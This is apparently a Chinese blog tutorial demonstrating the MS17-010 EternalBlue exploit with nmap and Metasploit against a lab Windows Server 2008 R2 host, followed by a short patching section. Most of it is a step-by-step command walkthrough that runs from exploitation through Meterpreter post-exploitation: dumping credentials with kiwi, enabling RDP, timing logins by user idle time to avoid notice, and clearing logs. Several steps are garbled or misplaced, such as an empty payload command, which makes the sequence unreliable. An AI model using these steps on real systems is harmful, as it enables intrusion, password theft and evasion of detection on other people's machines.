MS17-010（Eternal blue永恒之蓝）漏洞利用+修复方法

前言

提到操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于WannaCry勒索病毒的诞生。

该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播 。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。

0×01 准备工作

• 靶机：Windows server 2008R2(IP:192.168.178.128)

• 攻击机：Kali 2020(IP:192.168.178.131)

• 工具：namap（这里主要用于漏洞扫描，也可以使用nussus等其他工具）、metasploit(msf)

0×02 准漏洞利用

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现，靶机上扫到了4个漏洞，其中包括

打开metasploit（msf很有意思的是,每次打开都会显示不同的画面。）

msfconsole

搜索ms17-010相关模块，可以看到一共找到了6个不同的模块。（选项：0-5）

search ms17-010

加载扫描模块。（选项1）

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options

RHOSTS显示远程主机未配置，配置目标主机。

set rhosts 192.168.178.128

开始扫描漏洞，再次证实靶机存在MS17-010漏洞。

exploit

使用永恒之蓝攻击模块：exploit/windows/smb/ms17_010_eternalblue

并设置攻击载荷：

set payload

查看选项并设置rhosts:

 meterpreter > screenshot

输入exploit开始攻击。

运行成功会出现meterpreter >

Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，
对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

1、捕获屏幕

 meterpreter > screenshot

2、上传/下载文件

meterpreter > upload hello.txt c://

meterpreter > download d://1.txt

3、远程桌面

meterpreter > run vnc

启动失败了- -好像是靶机没有启动vnc服务。

4、获取cmd,出现了编码问题。

meterpreter > shell

5、获取用户密码

meterpreter > load kiwi Loading extension kiwi...Success.

Kiwi在32位系统中能够正常使用，到了64位系统中需要用到进程迁移

完成进程迁移后:

meterpreter > creds_all

6、启用远程桌面，配合上一步获取到的密码。

meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长，空闲时间长再进行远程登陆，减小被发现的风险。登录rdp会把对方顶掉。

meterpreter > idletime

使用 rdesktop 命令远程连接桌面

root@kali:~# rdesktop 192.168.2.6

• 1

用上一步获取的账户密码进行登录，登录成功。

7、清除日志

被清空了~

还有很多功能选项，可以自己去查一下，就不全部罗列出来了。

0×03  修复方案

• 关闭445端口。

• 打开防火墙，安装安全软件。

• 
  

  安装对应补丁。